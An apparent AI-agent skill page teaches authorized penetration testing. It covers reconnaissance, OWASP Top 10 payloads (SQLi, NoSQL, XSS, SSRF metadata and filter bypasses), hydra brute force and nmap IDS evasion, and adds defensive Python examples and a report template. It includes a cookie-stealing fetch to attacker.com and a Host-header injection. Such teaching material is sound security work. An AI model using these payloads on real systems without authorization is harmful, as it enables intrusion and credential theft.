pentest-expert
Professional penetration testing methodology. OWASP Top 10 testing, SQL injection, XSS, SSRF, authentication bypass, Burp Suite workflows, nmap scanning, and professional pentest report writing. For authorized testing only.
Installation

```bash
npx clawhub@latest install pentest-expert
```
Documentation
Professional Penetration Testing
⚠️ Authorization Required
Only test systems you own or have written authorization to test. Unauthorized testing is illegal worldwide. Keep your scope document accessible. Never exceed defined scope.
Penetration Testing Methodology (PTES/OWASP)
1. Pre-Engagement
- Scope definition (IPs, domains, excluded systems)
- Rules of engagement (timing, methods, escalation)
- Signed authorization document
2. Intelligence Gathering / Reconnaissance
- Passive: OSINT, no direct contact with target
- Active: Direct interaction with target systems
3. Threat Modeling
- Asset identification and value
- Attack surface mapping
- Likely attack paths
4. Vulnerability Analysis
- Automated scanning
- Manual verification
- False positive elimination
5. Exploitation
- Exploit vulnerabilities (stay in scope)
- Chain exploits for realistic impact
- Document every step
6. Post-Exploitation
- Establish persistence
- Lateral movement
- Data exfiltration simulation
7. Reporting
- Executive summary
- Technical findings with severity
- Remediation guidance
- Evidence screenshots/logs
Reconnaissance
Passive Recon (No Target Contact)
```bash
# WHOIS and domain info
whois target.com
dig target.com ANY @8.8.8.8   # many resolvers answer ANY minimally (RFC 8482); fall back to A, AAAA, MX, NS, TXT
dig -x 203.0.113.1 # Reverse DNS
# Subdomain enumeration
# amass is the gold standard
amass enum -d target.com -passive -o subdomains.txt
# Certificate transparency logs (reveals subdomains)
curl "https://crt.sh/?q=%.target.com&output=json" | \
jq -r '.[].name_value' | sort -u | grep -v '\*'
# TheHarvester — email, subdomains, IPs from search engines
theHarvester -d target.com -b google,bing,linkedin,hunter -l 500
# Google dorks (search-engine queries, not shell commands)
site:target.com filetype:pdf
site:target.com intext:"password"
site:target.com "index of /"
site:target.com ext:env OR ext:bak OR ext:config
# Shodan (internet-exposed assets)
# shodan search 'hostname:target.com'
# shodan search 'org:"Target Corporation"'
# LinkedIn/employee enumeration for social engineering scenarios
# haveibeenpwned for credential exposure check
```
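The `jq` one-liner above drops every line containing a wildcard and does not de-duplicate case variants. The following added example (not part of the pentest-expert skill) turns crt.sh JSON into a clean hostname inventory for the external attack-surface list; the records in `CRT_SH_SAMPLE` are constructed to mirror the crt.sh schema, where `name_value` can hold several SAN names separated by newlines.

```python
"""Turn crt.sh JSON output into a clean hostname inventory.

Added example (not part of the pentest-expert skill): the sample records
below are constructed to mirror the crt.sh schema, where `name_value` may
hold several SAN names separated by newlines.
"""
import json

# Constructed sample of what https://crt.sh/?q=%.target.com&output=json returns
CRT_SH_SAMPLE = json.dumps([
    {"common_name": "www.target.com", "name_value": "www.target.com\ntarget.com"},
    {"common_name": "*.dev.target.com", "name_value": "*.dev.target.com"},
    {"common_name": "API.target.com", "name_value": "API.target.com\nwww.target.com"},
    {"common_name": "target.com.example.net", "name_value": "target.com.example.net"},
])


def hostnames_from_crtsh(raw_json, apex):
    """Return sorted, de-duplicated hostnames under `apex` found in crt.sh JSON."""
    apex = apex.lower().strip(".")
    found = set()
    for record in json.loads(raw_json):
        # name_value carries every SAN of the certificate, newline-separated
        for name in record.get("name_value", "").split("\n"):
            name = name.strip().lower().strip(".")
            if name.startswith("*."):
                # a wildcard cert still proves the parent label exists; keep that
                name = name[2:]
            # exact suffix match: keeps out look-alikes such as target.com.example.net
            if name == apex or name.endswith("." + apex):
                found.add(name)
    return sorted(found)


if __name__ == "__main__":
    for host in hostnames_from_crtsh(CRT_SH_SAMPLE, "target.com"):
        print(host)
```

Run it against the real crt.sh output by replacing `CRT_SH_SAMPLE` with the body of the `curl` call above; the suffix check is what keeps certificates for unrelated domains that merely contain the string `target.com` out of the inventory.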
Active Recon
```bash
# Network scanning with nmap
# (-sS, -sU and -O need root; run with sudo)
# Quick scan (top 1000 ports)
nmap -T4 -A target.com -oN quick_scan.txt
# Full port scan (all 65535)
nmap -p- -T4 --open target.com -oN full_ports.txt
# Service/version detection on discovered ports
nmap -sV -sC -p 22,80,443,8080,8443 target.com -oN services.txt
# UDP scan (slower, often missed)
nmap -sU -T3 --top-ports 200 target.com
# OS detection
nmap -O target.com
# Firewall/IDS evasion techniques
nmap -sS -T2 -f --data-length 24 target.com # Fragmented, slow
nmap --scan-delay 1s target.com
# Web technology fingerprinting
whatweb https://target.com
# wappalyzer: browser extension, not a CLI tool
curl -I https://target.com # HTTP headers reveal server, framework
# Directory/file enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt -t 50 -o gobuster.txt
ffuf -w wordlist.txt -u https://target.com/FUZZ -mc 200,301,302,401,403
```
Web Application Testing (OWASP Top 10)
A01: Broken Access Control
```bash
# Test for IDOR (Insecure Direct Object Reference)
# If /api/users/123 returns your data, try:
curl -H "Authorization: Bearer YOUR_TOKEN" https://target.com/api/users/124
curl -H "Authorization: Bearer YOUR_TOKEN" https://target.com/api/users/1
# Horizontal privilege escalation
# Login as user A, try to access user B's resources
# Change: ?user_id=B, /user/B/profile, {"user_id": "B"}
# Vertical privilege escalation
# Login as regular user, try admin endpoints:
curl https://target.com/api/admin/users
curl https://target.com/admin/
curl https://target.com/api/v1/settings
# JWT manipulation
# Decode: echo "eyJ..." | base64 -d   (segments are base64url without padding; add "==" if base64 complains)
# Algorithm confusion: change alg to "none"
# Key confusion: try signing HS256 with public RSA key
# Forced browsing
gobuster dir -u https://target.com -w admin_wordlist.txt
```
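The IDOR and JWT findings above share one root cause: the server trusts something the client controls (an object id, or the token's own `alg` header) to decide what is allowed. The following is an added example, not code from the pentest-expert skill, of the server-side shape that closes both: the algorithm is pinned in code, so an `alg: none` or RS256-labelled token is refused before any key is touched (which also removes the HS256-with-RSA-public-key confusion), and every object read is checked against the verified subject. The secret, the user table and the `admin` role name are constructed for the demo.

```python
"""Pinned-algorithm JWT verification plus object-level authorization.

Added example, not code from the pentest-expert skill. The secret, user
records and role names are constructed for the demo.
"""
import base64
import hashlib
import hmac
import json
import time

SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"   # constructed
PINNED_ALG = "HS256"   # verification never consults the token's alg to pick a key or method

# Constructed user store: id -> record
USERS = {
    "123": {"name": "alice", "email": "alice@example.invalid"},
    "124": {"name": "bob", "email": "bob@example.invalid"},
}


def _b64url_decode(data):
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def mint_token(claims):
    """Issue an HS256 token (only the server does this)."""
    header = _b64url_encode(json.dumps({"alg": PINNED_ALG, "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(SERVER_SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_token(token, now=None):
    """Return the claims or raise ValueError. Refuses alg=none and any alg swap."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    # The server decides the algorithm. A token claiming "none" or RS256 is
    # rejected here, before any key material is used.
    if header.get("alg") != PINNED_ALG:
        raise ValueError("unexpected alg")
    expected = hmac.new(SERVER_SECRET, f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(payload_b64))
    if claims.get("exp", 0) <= (time.time() if now is None else now):
        raise ValueError("expired")
    return claims


def get_user(token, requested_id, now=None):
    """Object-level authorization: a caller may read only their own record
    unless the *verified* token carries the admin role."""
    claims = verify_token(token, now)
    if claims["sub"] != requested_id and "admin" not in claims.get("roles", []):
        raise PermissionError("forbidden")
    return USERS[requested_id]


def access_allowed(token, requested_id, now=None):
    """True if get_user would succeed; convenient for exercising the checks."""
    try:
        get_user(token, requested_id, now)
        return True
    except (ValueError, PermissionError, KeyError):
        return False


def unsigned_token_for_test(claims):
    """An alg=none token with an empty signature, built only to show it is refused."""
    header = _b64url_encode(b'{"alg":"none","typ":"JWT"}')
    return f"{header}.{_b64url_encode(json.dumps(claims).encode())}."
```

The two design points worth copying into any code base: the algorithm and key come from server configuration, never from the token, and the authorization decision compares the requested object against the verified `sub`, so changing `124` to `1` in the URL is answered with a 403 regardless of what the client sends.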
A02: Cryptographic Failures
```bash
# Check for HTTPS everywhere
curl -I http://target.com # Should redirect to HTTPS
# SSL/TLS testing
sslyze --regular target.com
testssl.sh target.com
nmap --script ssl-enum-ciphers -p 443 target.com
# Look for weak protocols
# TLS 1.0/1.1 should be disabled
# SSLv2/v3 must be disabled
# Check for BEAST, POODLE, Heartbleed
# Check headers
curl -I https://target.com | grep -i "strict-transport\|content-security\|x-frame\|x-content-type"
```
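The `grep` above only shows which headers exist; it says nothing about whether `max-age` is long enough or whether session cookies carry the `Secure`, `HttpOnly` and `SameSite` flags that the A07 section lists. The following added example (not code from the pentest-expert skill) audits a raw response such as the output of `curl -I`; both responses it ships with are constructed, one weak and one hardened, so the checks can be compared side by side.

```python
"""Audit transport-security headers and cookie flags from a raw HTTP response.

Added example, not part of the pentest-expert skill. Both responses below
are constructed; feed it the output of `curl -I` instead.
"""
import re

# Constructed: a weak response (short HSTS, no CSP, no nosniff, weak cookies)
WEAK_RESPONSE = """HTTP/1.1 200 OK
Server: nginx
Strict-Transport-Security: max-age=3600
X-Frame-Options: DENY
Set-Cookie: session=abc123; Path=/; HttpOnly
Set-Cookie: pref=dark; Path=/
"""

# Constructed: the same response after hardening
HARDENED_RESPONSE = """HTTP/1.1 200 OK
Strict-Transport-Security: max-age=63072000; includeSubDomains
Content-Security-Policy: default-src 'self'
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Set-Cookie: session=abc123; Path=/; Secure; HttpOnly; SameSite=Strict
"""

REQUIRED = {
    "strict-transport-security": "HSTS missing: first request can be downgraded to HTTP",
    "content-security-policy": "CSP missing: no defence in depth against injected script",
    "x-frame-options": "X-Frame-Options missing: page can be framed (clickjacking)",
    "x-content-type-options": "X-Content-Type-Options missing: MIME sniffing allowed",
}
ONE_YEAR = 31536000


def parse_response_headers(raw):
    """Return [(name_lower, value)], preserving repeats such as multiple Set-Cookie."""
    headers = []
    for line in raw.strip().splitlines()[1:]:      # element 0 is the status line
        if not line.strip():
            break                                   # blank line ends the header section
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def audit(headers):
    """Return a list of findings; an empty list means every check passed."""
    findings = []
    present = {name for name, _ in headers}
    for name, message in REQUIRED.items():
        if name not in present:
            findings.append(message)
    for name, value in headers:
        if name == "strict-transport-security":
            m = re.search(r"max-age=(\d+)", value)
            if not m or int(m.group(1)) < ONE_YEAR:
                findings.append("HSTS max-age shorter than one year")
        elif name == "x-content-type-options" and value.lower() != "nosniff":
            findings.append("X-Content-Type-Options is not 'nosniff'")
        elif name == "set-cookie":
            cookie = value.split("=", 1)[0].strip()
            # attributes follow the name=value pair; compare flag names case-insensitively
            flags = {attr.strip().split("=")[0].lower() for attr in value.split(";")[1:]}
            for flag in ("secure", "httponly", "samesite"):
                if flag not in flags:
                    findings.append(f"cookie '{cookie}' lacks {flag}")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_response_headers(WEAK_RESPONSE)):
        print("-", finding)
```

The per-cookie loop is the part the `curl | grep` check misses entirely: a cookie without `HttpOnly` is readable by any injected script, and one without `SameSite` is sent on cross-site requests, which is the precondition for the CSRF test under A07.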
A03: SQL Injection
```bash
# Manual testing
# Add ' to parameters, look for errors
https://target.com/product?id=1'
https://target.com/search?q=test'--
# Time-based blind SQLi
https://target.com/product?id=1 AND SLEEP(5)--
https://target.com/product?id=1'; WAITFOR DELAY '0:0:5'-- # MSSQL
# Boolean-based blind
https://target.com/product?id=1 AND 1=1 # Returns result
https://target.com/product?id=1 AND 1=2 # Returns no result
# Automated with sqlmap (use responsibly)
sqlmap -u "https://target.com/product?id=1" --dbs --batch
sqlmap -u "https://target.com/product?id=1" -D mydb --tables --batch
sqlmap -r request.txt --level=3 --risk=2 # From Burp saved request
# NoSQL injection
{"username": {"$ne": null}, "password": {"$ne": null}} # MongoDB bypass
{"$where": "sleep(5000)"} # MongoDB time-based
```
A07: Authentication Failures
```bash
# Default credentials
admin/admin, admin/password, admin/123456
root/root, test/test, guest/guest
# Brute force with hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
# Check account enumeration
# Does "user not found" vs "wrong password" reveal valid users?
# Password reset flaws
# Predictable tokens (sequential IDs, low entropy)
# Token reuse (same token works after use)
# Token expiry (does old token still work?)
# Host header injection in reset emails:
curl -X POST https://target.com/api/password-reset \
-H "Host: attacker.com" \
-d '{"email": "[email protected]"}'
# Session management
# Cookie flags: Secure, HttpOnly, SameSite=Strict
curl -I https://target.com/login # Check Set-Cookie header
# Test cookie theft: no HttpOnly = XSS can steal cookies
# Test CSRF: no SameSite/no token = CSRF vulnerable
# MFA bypass
# Try response manipulation: change {"mfa_required": true} to false
# Replay old OTP codes
# Test backup codes
```
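Four of the checks above (account enumeration, predictable tokens, token reuse, token expiry) plus the Host-header reset link all land on the same piece of server code. The following added example, not code from the pentest-expert skill, is a password-reset flow that passes each of them: the response is identical whether or not the address exists, tokens come from `secrets`, only a hash of each token is stored, a token is invalidated on first use or after a fixed lifetime, and the link is built from a configured base URL rather than the request's `Host` header. The user table, base URL and clock values are constructed.

```python
"""Password-reset flow that avoids the token and host-header flaws listed above.

Added example, not the pentest-expert skill's code. The user table, base URL
and clock values are constructed for the demo.
"""
import hashlib
import secrets

RESET_TTL_SECONDS = 15 * 60
# The link base comes from configuration, never from the request's Host header,
# so an injected Host cannot point the emailed link at a third party.
BASE_URL = "https://target.com"                    # constructed configuration value
KNOWN_USERS = {"alice@example.invalid"}            # constructed user table


class ResetTokenStore:
    """Single-use, expiring tokens; only a hash of each token is stored."""

    def __init__(self):
        self._pending = {}   # sha256(token) -> (email, expires_at)

    def issue(self, email, now):
        token = secrets.token_urlsafe(32)          # 256 random bits, nothing sequential
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._pending[digest] = (email, now + RESET_TTL_SECONDS)
        return token

    def redeem(self, token, now):
        """Return the email for a live token and invalidate it; None otherwise."""
        digest = hashlib.sha256(token.encode()).hexdigest()
        entry = self._pending.pop(digest, None)    # pop => a token works exactly once
        if entry is None:
            return None
        email, expires_at = entry
        if now >= expires_at:                      # expired tokens are dropped, not honoured
            return None
        return email


def reset_link(token):
    return f"{BASE_URL}/reset?token={token}"


def request_reset(email, store, now):
    """Same message whether or not the account exists, so nothing is enumerated.
    Returns (message, link_or_None); in production the link is emailed, never returned."""
    message = "If that address is registered, a reset link has been sent."
    if email.lower() in KNOWN_USERS:
        return message, reset_link(store.issue(email.lower(), now))
    return message, None
```

Storing `sha256(token)` instead of the token means a leaked database table does not hand out live reset links; the cost is one hash per lookup. The `pop` in `redeem` is what makes the "same token works after use" test fail against this code.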
A10: SSRF (Server-Side Request Forgery)
```bash
# Any parameter that takes a URL is a potential SSRF target
https://target.com/api/fetch?url=https://internal.service
# Try internal endpoints
url=http://localhost/admin
url=http://169.254.169.254/latest/meta-data/ # AWS metadata
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
url=http://metadata.google.internal/computeMetadata/v1/ # GCP
url=http://100.100.100.200/latest/meta-data/ # Alibaba Cloud
# Bypass filters
url=http://127.0.0.1:8080
url=http://[::1]:8080 # IPv6 localhost
url=http://0177.0.0.1/ # Octal
url=http://0x7f000001/ # Hex
url=http://localhost.attacker.com/ # DNS rebinding
# Use Burp Collaborator or requestbin.com for blind SSRF
url=https://your-collaborator.burpcollaborator.net/
```
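The bypass list above is exactly the test set a URL validator has to survive: string filters on `127.0.0.1` or `localhost` miss the octal, hex, IPv6 and attacker-controlled-DNS forms. The following added example (not code from the pentest-expert skill) takes the other approach: resolve the host, classify every resulting address with `ipaddress`, and hand back the one address the caller should connect to. `STUB_DNS` is a constructed resolver standing in for `socket.getaddrinfo` so the check runs offline; it mimics how libc reads the octal and hex dotted forms.

```python
"""Outbound URL validation against the SSRF bypasses listed above.

Added example, not code from the pentest-expert skill. STUB_DNS is a
constructed resolver standing in for socket.getaddrinfo so the check runs
offline; it mimics how libc parses octal and hex dotted forms.
"""
import ipaddress
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

# Constructed answers. In production: [r[4][0] for r in socket.getaddrinfo(host, None)]
STUB_DNS = {
    "example.org": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    "0177.0.0.1": ["127.0.0.1"],               # octal form, as inet_aton reads it
    "0x7f000001": ["127.0.0.1"],               # hex form
    "localhost.attacker.com": ["127.0.0.1"],   # attacker-controlled name pointing inward
    "metadata.google.internal": ["169.254.169.254"],
    "internal.service": ["10.0.0.5"],
}


def stub_resolver(host):
    try:
        return STUB_DNS[host]
    except KeyError:
        raise OSError(f"no such host: {host}")


def check_outbound_url(url, resolver=stub_resolver):
    """Return (allowed, reason, pinned_ip).

    Every address the host resolves to must be globally routable. The caller
    then connects to `pinned_ip` (still sending the original Host header), so a
    second DNS lookup at connect time cannot be rebound to an internal address."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme '{parts.scheme}' not allowed", None
    host = parts.hostname
    if not host:
        return False, "no host in URL", None
    try:
        addresses = [ipaddress.ip_address(host)]       # literal IP, including [::1]
    except ValueError:
        # not a literal: let the resolver decide (this is where 0177.0.0.1 ends up)
        try:
            addresses = [ipaddress.ip_address(a) for a in resolver(host)]
        except OSError:
            return False, f"{host} does not resolve", None
    for ip in addresses:
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
            ip = ip.ipv4_mapped                        # ::ffff:127.0.0.1 -> 127.0.0.1
        if not ip.is_global:   # loopback, RFC 1918, link-local, 100.64/10, reserved ranges
            return False, f"{ip} is not globally routable", None
    return True, "ok", str(addresses[0])
```

`is_global` is the right predicate rather than `is_private`: the Alibaba metadata address `100.100.100.200` sits in the shared address space 100.64.0.0/10, which `ipaddress` does not count as private but does exclude from global. Note also that the documentation ranges such as 203.0.113.0/24 used elsewhere on this page are not global either, which is why the stub answers with a real routable address.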
Burp Suite Workflow
1. Set browser proxy → 127.0.0.1:8080
2. Install Burp CA certificate (trust it)
3. Browse target normally → intercept traffic
Key tabs:
Proxy → Intercept/modify requests in-flight
Repeater → Manually resend and modify requests
Intruder → Automated fuzzing (rate-limited on Community)
Scanner → Automated vulnerability scanning (Pro)
Extensions → BApp store (add-ons)
Essential workflow:
- Map: browse all functionality, let Proxy capture
- Analyze: review requests in HTTP history
- Test: Send interesting requests to Repeater
- Fuzz: Use Intruder for parameter fuzzing
Pro extensions worth using:
- ActiveScan++ — enhanced scanner
- Logger++ — better logging
- Turbo Intruder — high-speed fuzzing
- JWT Editor — JWT manipulation
XSS Testing
```html
// Basic test payloads (HTML context)
"><script>alert(1)</script>
<img src=x onerror=alert(1)>
javascript:alert(1)
// Bypass filters
<ScRiPt>alert(1)</sCrIpT> // Case variation
<svg onload=alert(1)> // SVG tag
<details/open/ontoggle=alert(1)> // Less common event
"><img src=1 onerror=alert(1)> // Attribute breakout (closes the quoted value first)
eval(String.fromCharCode(97,108,101,114,116,40,49,41)) // Char codes
// JavaScript context (if output is inside JS)
';alert(1);//
\';alert(1);//
// Stored XSS impact demonstration (cookie theft)
<script>
fetch('https://attacker.com/steal?c=' + encodeURIComponent(document.cookie))
</script>
// DOM XSS
location.hash, document.URL, document.referrer
// Test: https://target.com/#"><img src=x onerror=alert(1)>
```
Penetration Test Report Structure
# Penetration Test Report
**Target:** target.com
**Test Period:** 2024-01-15 to 2024-01-19
**Conducted By:** [Tester Name]
**Classification:** CONFIDENTIAL
## Executive Summary
[Non-technical summary for management. Key findings, risk level, most critical issues.]
## Scope
- In scope: *.target.com, 192.168.1.0/24
- Out of scope: target-prod.com, third-party integrations
## Summary of Findings
| ID | Title | Severity | CVSS | Status |
|----|-------|----------|------|--------|
| F-01 | SQL Injection in /search | Critical | 9.8 | Open |
| F-02 | Stored XSS in Comments | High | 7.5 | Open |
| F-03 | Missing Security Headers | Medium | 5.3 | Open |
## Detailed Findings
### F-01: SQL Injection in /search
**Severity:** Critical (CVSS 9.8)
**Affected URL:** https://target.com/search?q=
**Description:**
The search parameter is directly interpolated into a SQL query without parameterization.
**Evidence:**
Request:
GET /search?q=test' AND SLEEP(5)-- HTTP/1.1
Response: 5-second delay observed (time-based blind SQLi confirmed)
**Impact:**
Full database read/write access. Potential OS command execution via xp_cmdshell.
**Remediation:**
Use parameterized queries / prepared statements:

```python
# Vulnerable
cursor.execute(f"SELECT * FROM products WHERE name = '{q}'")
# Fixed
cursor.execute("SELECT * FROM products WHERE name = %s", (q,))
```
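The two-line remediation above can be exercised end to end. The following added example, not part of the pentest-expert report template, runs both forms against an in-memory SQLite table with constructed rows so the difference is observable: the interpolated query is broken by a lone quote (the manual test from the A03 section) and widened by a `' OR 1=1--` suffix, while the parameterized query treats the same input as an ordinary string. SQLite's placeholder is `?` where the psycopg2/MySQL drivers in the remediation use `%s`; the semantics are the same.

```python
"""Why the parameterized query in the remediation works.

Added example, not part of the pentest-expert report template. Uses an
in-memory SQLite table with constructed rows; SQLite's placeholder is `?`
where psycopg2/MySQL drivers use `%s`.
"""
import sqlite3


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products (name, price) VALUES (?, ?)",
                     [("Widget", 9.99), ("Gadget", 19.99), ("Gizmo", 4.50)])  # constructed rows
    return conn


def search_vulnerable(conn, q):
    """String interpolation: the input becomes part of the SQL grammar."""
    return conn.execute(f"SELECT name FROM products WHERE name = '{q}'").fetchall()


def search_fixed(conn, q):
    """Bound parameter: the input is always a string value, never SQL."""
    return conn.execute("SELECT name FROM products WHERE name = ?", (q,)).fetchall()


def breaks_on_quote(conn, search):
    """True when a lone quote makes the query fail: the page's manual ' test."""
    try:
        search(conn, "O'Reilly")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    conn = setup_db()
    probe = "test' OR 1=1--"
    print("vulnerable:", search_vulnerable(conn, probe))   # every row
    print("fixed:     ", search_fixed(conn, probe))        # no row is named that
```

A name like `O'Reilly` is also legitimate input, so the quote-induced error in the vulnerable form is a functional bug as well as a finding; the bound parameter handles it without any escaping code in the application.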
Severity Rating (CVSS v3.1)
| Rating | CVSS Score | Examples |
|--------|------------|----------|
| Critical | 9.0-10.0 | Unauthenticated RCE, SQL injection with data exfil |
| High | 7.0-8.9 | Auth bypass, SSRF with AWS credential access, stored XSS |
| Medium | 4.0-6.9 | CSRF, reflected XSS, info disclosure |
| Low | 0.1-3.9 | Missing headers, verbose errors |
| Informational | 0.0 | Best practice recommendations |